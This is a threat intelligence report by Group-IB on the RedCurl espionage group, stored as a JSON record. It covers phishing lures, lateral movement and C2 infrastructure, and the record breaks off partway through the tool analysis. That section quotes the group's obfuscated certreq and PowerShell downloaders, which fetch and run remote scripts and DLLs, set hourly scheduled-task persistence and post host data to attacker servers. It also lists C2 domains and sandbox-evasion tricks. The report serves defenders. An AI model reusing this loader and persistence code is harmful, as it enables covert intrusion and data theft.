{
	"id": "9e2acfe9-0d80-40fe-9ebf-fc3498c56b35",
	"created_at": "2026-05-07T02:43:22.38865Z",
	"updated_at": "2026-05-07T02:44:11.125875Z",
	"deleted_at": null,
	"sha1_hash": "761ecbca0bbb436bdd87f9046aa80dc189c59fda",
	"title": "",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 7935434,
	"plain_text": "REDCURL\r\nThe awakening\r\ngroup-ib.com\r\nNot for distribution or duplication\r\nNOVEMBER 2021\n\n2\r\nREDCURL: THE AWAKENING © GROUP−IB\r\n1. This report was written by Group-IB experts without any\r\nthird- party funding.\r\n2. The report provides information on the tactics, tools, and\r\ninfrastructure of the cybercriminal group RedCurl. The report’s goal\r\nis to minimize the risk of the group committing further illegal acts,\r\nsuppress any such activity in a timely manner, and raise awareness\r\namong readers. The report also contains indicators of compromise\r\nthat organizations and specialists can use to check their networks for\r\ncompromise, as well as recommendations on how to protect against\r\nfuture attacks. Technical details about threats are provided solely\r\nfor information security specialists so that they can\r\nfamiliarize themselves with them, prevent similar incidents\r\nfrom occurring in the future, and minimize potential damage.\r\nThe technical details about threats outlined in the report\r\nare not intended to advocate fraud or other illegal activities\r\nin the field of high technologies or any other fields.\r\n3. The report is for information purposes only and is limited\r\nin distribution. Readers or not authorized to use\r\nit for commercial purposes and any other purposes not related\r\nto education or personal non-commercial use.\r\nGroup-IB grants readers the right to use the report worldwide\r\nby downloading, reviewing, and quoting it to the extent justified\r\nby legitimate citation, provided that the report itself (including a link\r\nto the copyright holder’s website on which it is published) is given\r\nas the source of the quote.\r\n4. The entire report is subject to copyright and protected\r\nby applicable intellectual property law. 
It is prohibited to copy,\r\ndistribute (including by placing on websites), or use the information\r\nor other content without the right owner’s prior written consent.\r\nIf Group-IB’s copyright is violated, Group-IB will have the right\r\nto approach a court or other state institution to protect its rights\r\nand interests and seek punishment for the perpetrator as provided\r\nby law, including recovery of damages.\r\n© Group−IB, 2021\r\nRestrictions\n\n3\r\n© GROUP−IB\r\nCon t e n t s\r\nREDCURL: THE AWAKENING\r\nRedCurl: The awakening 4\r\nBefore RedCurl’s hibernation 6\r\nKey findings 8\r\nKill chain 9\r\nInitial access 10\r\nReconnaissance and lateral movement 15\r\nData exfiltration 16\r\nTools 17\r\nBackend 17\r\nRedCurl.InitialDropper 19\r\nRedCurl.Downloader 21\r\nRedCurl.Extractor 23\r\nRedCurl.FSABIN 24\r\nRedCurl.CHABIN1 and RedCurl.CHABIN2 27\r\nLNK file infector 28\r\nCommands 29\r\nConclusion 33\r\nMITRE ATT\u0026CK ® (RedCurl) 34\r\nIndicators of compromise 36\r\nRecommendations 39\r\nContents\n\n4\r\n© GROUP−IB\r\nR e d C u r l: T h e awa ken i n g\r\nREDCURL: THE AWAKENING\r\nRedCurl: The awakening\r\nOn a Saturday morning in April 2021, Group-IB Threat Intelligence\r\nspecialists woke up to a headache. Nothing unusual after a Friday\r\nevening, you might say. Yet this time, the headache was caused\r\nnot by the finest Czech samples analyzed the previous evening,\r\nbut by a bright red flashing image of the Gorgon Medusa. Group-IB’s system had detected a new attack by RedCurl, a Russian-speaking hacker group that we had uncovered and described a year\r\nearlier, and which later disappeared from our radar.\r\nIn the meantime, the members of RedCurl — as the group was\r\nnamed by Group-IB specialists — had not wasted any time. They\r\nmodified their tools but retained the same end goal: corporate cyber\r\nespionage. 
This time, the victim was one of the largest wholesale\r\nstores in Russia, which had already been attacked once before and\r\nwas in the process of being attacked when we started our research.\r\nAfter discovering traces of the first attack, Group-IB specialists\r\nimmediately contacted the victim, shared all the relevant\r\ninformation, and recommended what steps to take to contain the\r\nincident and prevent it from spreading. So began the research into\r\na new development in attacks by the hacker group RedCurl, whose\r\nactivities we first detailed a year ago in the report “RedCurl. The\r\npentest you didn’t know about.”\r\nOver the course of seven months, the group significantly improved\r\ntheir arsenal to achieve their main goal, which is conducting thoroughly\r\nprepared cyber espionage attacks that can only be detected\r\nby a highly qualified cybersecurity team. As in the past, in each\r\nof the campaigns analyzed the group’s aim was to infect computers\r\nin a targeted department within an organization’s infrastructure\r\nand to steal sensitive data.\r\nThe attackers were highly skilled in red teaming and knew how\r\nto develop malware that bypasses traditional antivirus software.\r\nThey also meticulously examined the victim before the attack,\r\nas could be seen from the spear phishing emails they sent to various\r\ndepartments within the targeted organization.\r\nEspionage in cyberspace is a hallmark of state-sponsored advanced\r\npersistent threats (APTs). In most cases, such attacks target other\r\nstates or state-owned enterprises. Corporate cyber espionage\r\nis still a relatively rare and, in many ways, unique occurrence.\r\nHowever, it is possible that the group’s success could lead to a new\r\ntrend in cybercrime.\r\nRedCurl is known for its patience: anywhere from two to six months\r\ncan pass from the time that “patient zero” is infected to the time\r\nthat data is stolen. 
The group’s main objective is to move covertly\r\nand remain undetected. RedCurl does not use any “active” Trojans\r\nor common ways of controlling compromised devices remotely.\r\nInstead, the hackers use self-developed tools that are constantly\r\nevolving and that make it possible to persist and move slowly within\r\nan infected infrastructure. Moreover, although they do not shy\r\naway from using publicly available scripts (such as LaZagne) and\r\ntechniques (changing WDigest parameters and dumping lsass.exe,\r\na process that already contains passwords as plain text), their\r\nactions and methods remain unique.\r\nDespite a high level of control of the victim’s network, the group\r\ndoes not encrypt infrastructure, withdraw money from accounts,\r\nor demand ransoms for stolen data. In other words, RedCurl\r\ndoes not actively seek to achieve the types of financial goals\r\nthat cybercriminals typically have. The group strives to ensure\r\nthat victims do not notice any infection. Even after the attack has\r\nended, victims could remain unaware that all their confidential\r\ninformation has been exfiltrated to RedCurl’s servers.\r\nRedCurl: a corporate cyber espionage hacker group.\r\nThe group’s goal: to steal documents containing commercially sensitive information and employees’ personal data.\r\nTools: the group acted as covertly as possible to minimize the risk of being discovered on the victim’s network. RedCurl did not use actively communicating Trojans or remote administration tools.\r\nBefore RedCurl’s hibernation\r\nOur previous report on RedCurl mentions that we first discovered\r\nthe group’s activity in 2019. An in-depth investigation into the\r\ngroup’s operations helped us uncover attacks conducted\r\nin 2018.
Victims included companies in the fields of finance, tourism,\r\ninsurance, construction, consulting, and retail located worldwide,\r\nfrom Russia to North America.\r\nAfter obtaining up-to-date information about the victim\r\norganization’s current employees, the hackers sent spear-phishing\r\nemails with decoy documents. This year, we uncovered four more\r\nattacks, although we were unfortunately unable to identify any\r\nvictims for two of them. The updated attack timeline is shown below.\r\n[Infographic: number of attacks, identified victims, attacks since the beginning of 2021, and dwell time in the victim’s infrastructure (2-6 months)]\r\nGiven that the group’s main goal is cyber espionage (stealing\r\noffice documents as well as text and image files), RedCurl can stay\r\nin the victim’s infrastructure unnoticed for a long time. Based on our\r\nexperience in responding to incidents associated with the group,\r\nthe time between the initial infection and the theft of documents\r\nis from two to six months. The group is interested in the following\r\ntypes of files:\r\n• Staff records\r\n• Documents about various legal entities\r\n• Court records\r\n• Internal documents\r\n• Email history\r\nIf necessary, publicly available tools (e.g., NirCmd, 7-Zip, curl,\r\nADExplorer, and LaZagne with the Python Interpreter) can\r\nbe delivered to the infected system.\r\nOne of the group’s distinctive features is that during attacks it uses\r\nas few custom executable files as possible and as many batch and\r\nPowerShell scripts as possible. Examples of such scripts include\r\nmodules that act as downloaders.
Functionality is expanded\r\nby uploading and executing commands that are also batch scripts.\r\nIf the command interpreter’s functionality is insufficient for the\r\nattackers, they insert a PowerShell script into the batch scripts.\r\n[Figure: timeline of RedCurl attacks from 2018 to 2021; each attack is marked with the victim’s country (RU, DE, UA, CA, NO, or N/A where the victim was not identified)]\r\nWith every new attack, the hackers introduced small\r\nimprovements. This is despite the fact that the tools used were\r\ninitially flexible (due to the module system) and could not be detected\r\nby almost any security solution (because using legitimate disk\r\nstorage systems, as many legitimate tools, and as few proprietary\r\ntools as possible creates “noise” that makes antivirus software and\r\nother solutions less effective). After our first report was published\r\nlast year, RedCurl disappeared from our radar and could no longer\r\nbe detected by Threat Intelligence \u0026 Attribution. It seemed at the\r\ntime that the group had decided to take a timeout and update its\r\ntoolset.\r\nHowever, when the time came for companies to publish their\r\nfinancial reports (arguably the most appealing time for a group\r\ninvolved in espionage), RedCurl conducted an attack the best\r\nway it knows how: by sending two carefully crafted mailouts, one\r\npurporting to come from the victim organization’s HR department\r\nand the other from a government services portal.
The emails had\r\nobviously nothing to do with said HR department or government\r\nservices portal.\r\nIn this report, we describe RedCurl’s latest attack, from the kill chain\r\nto a detailed breakdown of every tool the hackers used. In addition\r\nto the report suggesting various ways to detect RedCurl within\r\nan organization’s infrastructure, it also offers recommendations\r\nfrom Group-IB specialists on how to counter cyberattacks\r\nby RedCurl and prevent financial damage due to cyber espionage\r\nbenefiting third parties.\r\nKey findings\r\nGoal: Corporate cyber espionage and documentation theft.\r\nActive: The group has been active since 2018. Over more than three years,\r\nGroup-IB have identified 30 attacks.\r\nScripts: RedCurl has shifted its focus from batch and PowerShell scripts\r\nto executable files.\r\nTools: The tools contain logic errors — it is likely that the group did not\r\nhave enough time to test its new tools and that the attack was\r\nprepared in a hurry.\r\nThe group has made significant improvements to most of its tools.\r\nEffective methods of data encryption within malware files make\r\nthem much more difficult to analyze. Some tools were left almost\r\nunchanged, possibly due to a tight schedule to develop new tools.\r\nThe group will most likely continue to modify them.\r\nThe set of tools used for the attack was likely compiled a few hours\r\nbefore the attack or even as it was taking place.\r\nDomains: RedCurl registers domain names on free web hosting services;\r\nthe group has almost stopped using the WebDav protocol.\r\nIn past attacks, the network drives the group controlled used only\r\ncommand modules.\r\nKill chain\r\nFigure 1.
Common scheme of kill chain\r\n[Diagram: a phishing email carries a malicious LNK attachment (RedCurl.InitialDropper), which downloads and launches a PowerShell script; the script creates a scheduled task and passes the decryption key to RedCurl.Downloader (DLL), which downloads and launches RedCurl.Extractor (DLL); the extractor drops its files, creates a task, and passes the decryption key to RedCurl.FSABIN (DLL), which downloads and executes commands. Every stage is fetched over HTTP.]\r\nOn this occasion, RedCurl attacked one of Russia’s largest\r\nwholesale companies, which sells a wide range of home, office, and\r\nleisure goods. Most of the company’s customers are small and\r\nlarge wholesalers and chain stores, and the company itself is also\r\ninvolved in retail. The fact that a larger partner network was involved\r\ncould have suggested a supply chain attack (conducted through\r\nan intermediate victim). However, this was not the case as the\r\nhackers attacked the wholesale company itself — twice, as we were\r\nable to determine. It is pointless to speculate why one attack did\r\nnot suffice. However, usually this means that the infection vector\r\nwas not closed off in time and that the hackers were able to use\r\nit twice. It likely also means that the hackers did not manage to find\r\nwhat they were looking for during their first attempt. In any case,\r\nthese are just hypotheses.\r\nThe first thing that caught our attention as we were investigating\r\nRedCurl’s latest attack was that the kill chain for “patient zero” had\r\ngrown larger. In the group’s previous attacks, the time between\r\nreceiving the phishing email and launching the module responsible\r\nfor executing the code included three to four stages. In the latest\r\nattack, the infection chain had as many as five stages. First, the\r\ngroup added a new reconnaissance tool whose code shares many\r\nsimilarities with the binary version of the FirstStageAgent module\r\n(we named the tool FSABIN), as well as a PowerShell downloader\r\nfor the tool.
The overall infection pattern is illustrated in Figure 1 above.\r\nAs seen in that diagram, RedCurl now actively uses web hosting\r\nservices, from which modules are spread in the system’s infection\r\nchain. During the research, we discovered that the following third-level domains registered on free services were used as C2 servers:\r\n*.atspace[.]tv\r\n*.filecloudio[.]club\r\n*.myartsonline[.]com\r\n*.medianewsonline[.]com\r\n*.atspace[.]eu\r\n*.c1[.]biz\r\nWe will look at each tool in detail later in this report. First, let’s focus\r\non the kill chain.\r\nInitial access\r\nAs mentioned in the introduction, RedCurl conducted two attacks\r\non a large wholesale store. As is typical for the group, the initial\r\nattack vector was spear-phishing emails. Targeted email campaigns\r\nmade to look like they were sent by the victim’s HR department\r\nhave become the group’s trademark. In the first of the latest\r\nattacks we analyzed, the hackers did not stray away from tradition,\r\nwhich can clearly be seen from the example email. As usual, social\r\nengineering was involved. The decoy document mentions changes\r\nto staff incentive programs, essentially luring employees into\r\nclicking on the link provided with the promise of bonuses:\r\nFig. 2. Examples of RedCurl emails purporting to be from the HR department\r\nDuring the second attack, the emails were sent in a no less\r\nsophisticated way. This time, they were disguised as originating from\r\na government services portal:\r\nOf course, the email had nothing to do with the government services\r\nportal. The cybercriminals simply took advantage of a name that\r\neveryone knows. All emails were sent from addresses registered\r\nwith Outlook.
Based on data contained in the email headers and\r\nthe information we obtained from our in-house technology called\r\nGroup-IB Network Graph, the hackers used proxy servers to send\r\nthe emails to the victims. For example, one of the emails was sent\r\nfrom the IP address 37.120.221[.]28:\r\nFig. 3. Example of a RedCurl email allegedly sent from the government portal\r\nFig. 4. Screenshot from Group-IB Network Graph with information about the\r\nIP address (cut version)\n\n12\r\n© GROUP−IB\r\nI n itia l acc ess\r\nREDCURL: THE AWAKENING\r\nEvery email contained a link to a 7-Zip archive with an LNK file (the\r\nfile in question was classified as RedCurl.InitialDropper) designed\r\nto download and launch the next stage, which was a feature\r\nin the group’s previous attacks. Links in the archive redirected\r\nto a fourth-level domain: *.md.cloudexpdef[.]email. The domain\r\ncloudexpdef[.]email itself was registered not long before the first\r\nmailout and, presumably, was used to attack several organizations.\r\nBased on when the files were compiled, it seems that the hackers\r\ncollected malicious executable files shortly before the attack.\r\nIn one attack, the compilation time for RedCurl.Downloader was\r\nMay 25, 2021, at 06:25, while the malicious email was sent an hour\r\nlater on May 25, 2021, at 7:22. 
The next stage of the kill chain,\r\nRedCurl.Extractor, which contains the module RedCurl.FSABIN,\r\nwas compiled on May 25, 2021, at 11:50 (as was the module itself).\r\nThe timing could indicate that the hackers validated the infection\r\nmanually and compiled the tools on the fly.\r\nFig. 5. Stages of how RedCurl gained initial access to the victim organization’s network: compiling RedCurl.Downloader (25.05.2021 06:25); sending an email (25.05.2021 07:22); compromising the targeted organization; compiling RedCurl.Extractor and RedCurl.FSABIN (25.05.2021 11:50).\r\nWhen users opened the LNK file, network drives were not mounted.\r\nInstead, the next stage — batch or PowerShell scripts — was located\r\non the server controlled by the hackers. The scripts were\r\ndownloaded using various methods, each of which is described\r\nin detail in the Tools section.\r\nThe second stage was necessary for downloading and launching\r\na new tool in the group’s framework, RedCurl.Downloader. The\r\nsecond stage was also responsible for ensuring persistence of the\r\ndownloader (i.e., the DLL file) through a task in the Scheduler that\r\nrecurred once an hour.\r\nIn our first report, we noted that RedCurl.Dropper contained\r\nimportant data such as strings encrypted with a password that\r\nwas passed as an argument. In one of the recent attacks, the\r\ngroup went even further: a part of the password was located in the\r\nmalware body, while another part was in the form of an argument. This\r\nmeans that obtaining the file alone was not enough to extract any\r\nuseful data from it because decrypting the strings required launch\r\narguments.
RedCurl.Downloader was launched using the standard\r\nutility rundll32.exe, for which a pathway to the malicious library and\r\nthe second part of the password were passed as arguments.\r\nIn addition to RedCurl.Downloader being downloaded and\r\nlaunched, the second stage involves downloading and displaying\r\nthe decoy document, which is designed to lull the victim into a false\r\nsense of security. As in previous attacks, the group took great care\r\nin preparing the decoy documents. Their content was always directly\r\nrelated to the targeted organization. In most cases, the content\r\nof the decoy document was borrowed from open sources, including\r\nthe organization’s website, which usually includes information about\r\nthe team, management, and more.\r\nRedCurl.Downloader has two tasks: to collect and send information\r\nabout the infected device to the C2 server, and to download and\r\nlaunch the next stage. The latter is a modified version of the tool\r\ncalled RedCurl.Dropper that we described last year and classified\r\nas RedCurl.Extractor. It is indeed the same dropper, which\r\ndoes not perform any network communications and is designed\r\nto extract the 7z utility and the final stage, RedCurl.FSABIN, as well\r\nas achieve persistence of the latter on the infected device. Both\r\nfiles are located in the dropper body in encrypted form, as is the\r\nkey to decrypt them. The final stage, RedCurl.FSABIN, is launched\r\nby a task created by the dropper and repeated once an hour.\r\nAs in the case of RedCurl.Downloader, the strings in the body\r\nof RedCurl.FSABIN were encrypted with a password. The\r\napplication received part of that password in the form of a launch\r\nargument. As is clear from the name of the last stage, RedCurl.\r\nFSABIN, it is RedCurl.FirstStageAgent, which was described in the\r\nfirst report and is created in the form of an executable file. 
In the\r\nsame way as its PowerShell predecessor, the application collected\r\nand sent information about the infected device to the C2 server,\r\nas well as downloaded and executed command submodules, namely\r\nthe batch scripts. Commands, as well as the previous stages, were\r\nlocated on the HTTP servers controlled by the hackers. The outcome\r\nof executing the command was saved to a legitimate cloud drive\r\nthat was mounted during the attack. The command modules were\r\nleft largely unchanged.\r\nIt is important to note that in the new RedCurl.FSABIN, we did not\r\nfind any code fragments responsible for launching the equivalents\r\nof RedCurl.Channel1 and RedCurl.Channel2. However, during the\r\nincident response engagement, we discovered several additional\r\nexecutable files that had not been classified before, but whose\r\nfunctionalities bore strong similarities to Channel1 and Channel2.\r\nWe called them RedCurl.CHABIN1 and RedCurl.CHABIN2. We were\r\nunable to determine how exactly the modules were delivered to the\n\n14\r\n© GROUP−IB\r\nI n itia l acc ess\r\nREDCURL: THE AWAKENING\r\ninfected devices, but one of the possible vectors was a command\r\nthat RedCurl.FSABIN received from the hackers. The modules\r\nChannel1 and Channel2, as well as their binary equivalents, do not\r\ndiffer at all from FSA in terms of functionality and are designed\r\npurely as backup channels to control the infected device. If for any\r\nreason RedCurl.FSABIN stops responding (e.g., if the C2 server\r\naddresses are added to a blacklist in the victim’s network security\r\nsolutions), at least one of the channels becomes activated and the\r\nhackers can use it to control the infected device.\n\n15\r\n© GROUP−IB\r\nR econnaissance and lateral movement\r\nREDCURL: THE AWAKENING\r\nReconnaissance and\r\nlateral movement\r\nAfter infecting a computer in the victim’s network, RedCurl collects\r\ninformation about its infrastructure. 
The group is mainly interested\r\nin:\r\n• The name and version of the infected system\r\n• The list of network and logical drives\r\n• The list of passwords\r\n• Any other information that can be obtained using the standard\r\nutility systeminfo\r\nThe group’s lateral movement techniques have not changed:\r\nRedCurl compiles a list of directories on the network drive that are\r\navailable for writing. Next, the hackers create an LNK file designed\r\nto launch a modified version of RedCurl.Extractor. A legitimate\r\ndocument from the drive is used as a decoy. It is hidden from\r\nthe user, and the LNK file borrows its name. The pathway to the\r\noriginal document is sent as a RedCurl.Extractor parameter. This\r\nmeans that when a user within the organization opens the LNK file\r\nin question from the network drive, they launch RedCurl.Extractor\r\nas a result, which then launches the previously hidden document.\r\nDespite the relatively effective but slow way of moving within the\r\norganization’s infrastructure (the time between the initial infection\r\nand documents being stolen can take up to six months), the\r\nhackers did not go unnoticed. It was creating suspicious LNK files\r\non network drives that caught the attention of employees at the\r\nvictim’s security department. It was not possible to determine,\r\nhowever, which exact commands were executed on the infected\r\ndevices before the hackers moved across the network. Antivirus\r\nsoftware failed to detect the initial infection or stop the hackers\r\nfrom moving further within the victim’s network. 
Accordingly,\r\ncountering attacks by APT groups as advanced as RedCurl requires\r\ncomprehensive security measures.\n\n16\r\n© GROUP−IB\r\nD ata ex fi ltrati o n\r\nREDCURL: THE AWAKENING\r\nData exfiltration\r\nAs was the case in attacks that took place before 2021, which\r\nwe described in detail in our first report on the group, RedCurl\r\nstole data using command modules that, unlike other tools, have\r\nnot changed much. The attackers continued to save the outcomes\r\nof command executions to password-protected archives and wrote\r\nthem to legitimate cloud storage systems, with a different password\r\nfor each command. They also continued to use LaZagne (https://\r\ngithub.com/AlessandroZ/LaZagne) and ADExplorer (https://docs.\r\nmicrosoft.com/en-us/sysinternals/downloads/adexplorer).\r\nOne aspect worth pointing out is that a few commands\r\nwere combined into one. For example, one of the commands\r\nwe discovered collected information about the infected device\r\nusing built-in Windows tools and launched the LaZagne utility. In the\r\npast, separate commands performed the two tasks.\r\nDespite the more than seven-month lull between attacks, RedCurl\r\ndeveloped its tools in a hurry. While investigating one of the\r\ncommands, we uncovered a curious logical error: the environment\r\nvariable was indicated incorrectly in the module, which is why the\r\npassword for the archive was short and incorrect. It is likely that the\r\ngroup faced tight time constraints in conducting the attacks and\r\nthat they did not manage to test their tools sufficiently.\n\n17\r\n© GROUP−IB\r\nTools\r\nREDCURL: THE AWAKENING\r\nTools\r\nIn this part of the report, which details RedCurl’s new stage\r\nof activity, we carefully research each of the group’s updated tools.\r\nThe main change was “binarization”. RedCurl replaced PowerShell\r\nscripts with their equivalents, namely executable files, but without\r\nchanging the functionality of the tools. 
The only modules that were\r\nnot rewritten were commands (they were modified only slightly).\r\nThe tools are described in the order in which they were mentioned\r\nin the description of the kill chain.\r\nBackend\r\nAll of the group’s tools except commands sent information about\r\nthe infected device and received a payload through HTTP servers\r\nwhich were controlled by the group and located on free web hosting\r\nservices. As a result of CERT-GIB working closely with the support\r\nteams of the web hosting services, we were able to analyze the\r\nserver side of RedCurl’s tools. The servers we examined turned out\r\nto be layers between the operators and the infected device, and\r\nthey were designed to perform two tasks:\r\n1. Collect logs from infected devices\r\n2. Deliver the next stage to the infected device\r\nFig. 6. Scheme of RedCurl controlling the infected devices: the victim communicates over HTTP with the RedCurl web server, which the RedCurl operators access in turn.\r\nTo perform the first task, on the server side the cybercriminals\r\ndeployed Tiny File Manager V2.4.3, which is a project with open-source code available on GitHub: https://github.com/prasathmani/tinyfilemanager.\r\nThe server side has no tools for automatically\r\nsending the collected logs to a different server, which means that\r\nthe hackers retrieved the logs manually or using scripts from a different intermediate server.\r\nThe backend script was written in PHP. The servers merely\r\nprocessed the information obtained from the victim’s infected\r\ndevices and sent the next stage in response. All the information\r\nabout infected devices was saved to the logs directory in separate\r\nfiles, whose names corresponded to the names of the infected\r\ndevices.
More detailed information about how data was collected\r\ncan be found in the sections that describe the group’s tools.\r\nIn addition to information from the infected device, the IP address\r\nand the time that the request was received were saved in the file.\r\nBefore the latter took place, the time was adjusted according to the\r\ntime zone in Minsk, UTC+3 (lines 94-97). When obtaining the\r\nname of the computer and user, displaying them correctly in the file\r\nrequired using CP866 encoding (DOS Cyrillic Russian).\r\nFig. 7. Backend code area designed to control the Channel module\r\nFig. 8. Backend code area designed to correct the time zone\r\nThe certreq utility is a standard utility that comes with the Windows\r\noperating system. Although it is intended for requesting certificates\r\nfrom a certification authority, the utility can also download\r\nany file over HTTP, which the cybercriminals took advantage of.\r\nceRtReq -Q -Post -cOnFIg HTTP://%HTTP_URL% C:\\WINDowS\\Win.INi .\\$ENv:cOmpuTeRNAmE.tmp;\r\nMOVe .\\$EnV:cOMPUtErNaME.tmP .\\$EnV:COMpuTername.BAT -foRCE;\r\nStARt .\\${enV:COMpuTErnamE}.Bat -NONEwwinDow;\r\nIn the case of PowerShell scripts, two options are possible. The first\r\nis to use a class called System.Net.WebRequest, which is used\r\nto make a GET request with the User-Agent field filled in advance.\r\n$reQF = [sYsTem.nET.WEbreQUEst]::crEATE('hXXp://%HTTP_URL%');\r\n$ReqF.MEtHoD='gEt';\r\n$rEqf.useragenT = 'Mozilla/5.0 (Windows NT; Windows NT 10.0; ru-RU) WindowsPowerShell/5.1.20134.790';\r\n$ReSf = $ReqF.gEtreSPONsE();\r\n$stRF = $RESf.GetrEsponSeSTReam();\r\n$reaf = New-ObJEcT sysTem.io.STreAMrEADer $strF;\r\nPoWerSHell $rEaF.rEadToenD();\r\nIt is noteworthy that the C2 server did not return the payload\r\nif the User-Agent did not contain a PowerShell substring.
In the\r\nsecond PowerShell option, the settings of the proxy server were\r\ndetermined before the payload was received. If the infected\r\nsystem used proxy servers to access the Internet, they were used\r\nto obtain the next stage. In such cases, the next-stage malware\r\nwas downloaded using the Invoke-WebRequest function.\r\nThe downloaded script (the next stage) was launched using\r\nPowerShell without being saved to the infected system.\r\n$A=[SYStem.neT.WEBrEQueSt]::GEtSYstEMWebpRoXY().GeTpRoXY('http://msn.com');\r\nIF($a.HOST -eQ 'msn.Com'){\r\n (IwR -usEBASIcpARsInG -urI http://%URL%).tOstRInG()|POWErSHELl.EXe\r\n}ELSE{\r\n (IWR -usEBaSIcPArsInG -urI http://%URL% -PRoXy $A -pRoxYuseDefauLTcReDENTialS).tOsTRInG()|powErShELL.Exe\r\n};\r\nRedCurl.InitialDropper\r\nRedCurl.InitialDropper is the LNK file that was used during the\r\ninitial infection phase. After being launched, the LNK downloaded batch\r\nor PowerShell scripts from the C2 server in one of two ways: using\r\nthe certreq utility or standard methods available in PowerShell.\r\ncertreq\r\nThe certreq command is used\r\nto communicate with the certification\r\nauthority, including in order to request\r\ncertificates. The full description\r\nof the tool is available on the official\r\nwebsite: certreq | Microsoft Docs.\r\nThe next stage involved a PowerShell script designed to download\r\nRedCurl.Downloader and ensure its persistence. Before\r\ndownloading the next stage, the PowerShell script created a directory\r\nwith a name generated according to the template %APPDATA%\\[A-Z]{4}%COMPUTERNAME%, while the downloaded file was saved\r\nto the directory in question with the name [a-z]{4,5}%USERNAME%.dll.
The first characters of the directory and file names were stored in the script body and changed with each new attack.\r\nBy creating a task that repeats once an hour in the Task Scheduler, the PowerShell script ensured persistence for RedCurl.Downloader. RedCurl.Downloader was then launched using the standard utility rundll32.exe, with the path to the malicious library and the part of the password for decrypting the data located inside the executable file passed as arguments. Below is an example of a launch command:\r\nrundll32.exe shell32.dll,Control_RunDLL %MODULE_PATH% %DECRYPTION_KEY%\r\nThe task name was generated when the PowerShell script was launched and contained predefined strings, the user name, and the computer name. The template for generating the task name can be presented as follows:\r\n\\Temp\\[A-Z]{4}%COMPUTERNAME%\\[a-z]{4,5}%USERNAME%\r\nBelow is an example of a created task:\r\nFig. 9. Example of a task for launching RedCurl.Downloader\r\n\r\nApart from downloading and launching RedCurl.Downloader, the script downloaded a decoy document, saved it to a file named %APPDATA%\\%COMPUTERNAME%.pdf, and showed it to the user. Below is an example of a PowerShell downloader:\r\ncd $env:appdata;\r\n$fxt='.pdf';\r\n$rrdcvfdpg='hXXps://%URL%';\r\n$mnfld='exp';\r\n$dnpath='dn';\r\n$infro='inf';\r\n$fkupt='%KEY%';\r\n$hfcvswf='MTLK'+$env:computername;\r\n$jcnfgdw='paran'+$env:username+'.dll';\r\nmkdir .\\$hfcvswf;\r\n$tn='\\Temp\\UGTE'+$env:computername+'\\apra'+$env:username;\r\n$tr='rundll32.exe shell32.dll,Control_RunDLL '+$env:appdata+'\\'+$hfcvswf+'\\'+$jcnfgdw+' '+$fkupt;\r\nschtasks /create /SC hourly /MO 1 /tn $tn /TR $tr /F | Out-Null;\r\n$ocgfbca = New-Object -ComObject MSXML2.XMLHTTP;\r\n$ocgfbca.Open('POST', $rrdcvfdpg+'/'+$mnfld+'/'+$infro, $False);\r\n$ocgfbca.setRequestHeader('User-Agent','Mozilla/5.0 (Windows NT; Windows NT 10.0; ru-RU) 
WindowsPowerShell/5.1.20134.790');\r\n$ocgfbca.Send();\r\n[io.file]::WriteAllBytes($env:appdata+'\\'+$env:computername+$fxt, $ocgfbca.ResponseBody);\r\n$ocgfbca.Open('POST', $rrdcvfdpg+'/'+$mnfld+'/'+$dnpath, $False);\r\n$ocgfbca.setRequestHeader('User-Agent','Mozilla/5.0 (Windows NT; Windows NT 10.0; ru-RU) WindowsPowerShell/5.1.20134.790');\r\n$ocgfbca.Send();\r\n[io.file]::WriteAllBytes($env:appdata+'\\'+$hfcvswf+'\\'+$jcnfgdw, $ocgfbca.ResponseBody);\r\n$rn='.\\'+$env:computername+$fxt;\r\nrundll32 url.dll,FileProtocolHandler $rn | Out-Null\r\nRedCurl.Downloader\r\nRedCurl.Downloader is an intermediate stage intended to collect information about the infected device and to download and launch the next stage, RedCurl.Extractor. RedCurl.Downloader is a new tool that, unlike the group’s other tools, has no PowerShell equivalent. All important information, including the C2 server addresses used by the hackers, was stored in the body of the executable file encrypted with AES-128 CBC. The first 16 bytes of the SHA256 hash of the password were used as the decryption key. The password itself was the concatenation of two strings: the application received the first string as a parameter, while the second string was located in the malware body.\r\nBefore launch, the application checked for an Internet connection. The following string was used as the User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12. The check was performed by sending a GET request to a randomly chosen domain from the list of domains given below.\r\nIf the application received the 200 status code (Success) in response, it collected the following information about the infected device:\r\n1. Computer name\r\n2. Domain name\r\n3. User name\r\n4. Time zone\r\n5. 
Content list of the following directories: %PROGRAMFILES%, %DESKTOP% and %LOCALAPPDATA%. It should be noted that only the directory list was saved for %LOCALAPPDATA% and %PROGRAMFILES%, while files were also collected from %DESKTOP%.\r\nDomains used for the Internet connection check:\r\n• www.msn.com\r\n• www.google.com\r\n• www.yahoo.com\r\n• google.co.uk\r\n• tmall.com\r\n• www.microsoft.com\r\n• www.wikipedia.org\r\n• www.reddit.com\r\n• www.bing.com\r\n• www.amazon.com\r\n• www.taobao.com\r\nNext, all the information was sent to the C2 server in a POST request using a predefined User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246001. The request had quite an unusual format:\r\n%RANDOM_STRING%=BASE64(%COMPUTERNAME%)\u0026%RANDOM_STRING%=BASE64(%DOMAINNAME%)\u0026%RANDOM_STRING%=BASE64(%USERNAME%)\u0026%RANDOM_STRING%=%UNKNW_INT%\u0026%RANDOM_STRING%=BASE64(%LIST_OF_FILES%)\r\nIn the format above, %RANDOM_STRING% is a string of random characters generated according to the template [a-z]{5,19}. We would like to draw attention to the field %UNKNW_INT%.\r\nThe group’s older tools checked the time zone. If the infected system’s time zone was set to UTC-08:00 or UTC+01:00, the modules stopped working: these time zones are often used by default in various sandboxes, which makes this a relatively easy but effective way to prevent the application from being analyzed. In the samples we analyzed, this check was not performed, but the field in question was filled with a random number from the interval [0, 23], which falls within the range of possible time zone values. We assume that the hackers decided to remove the check from the client side and implement it on the server side. 
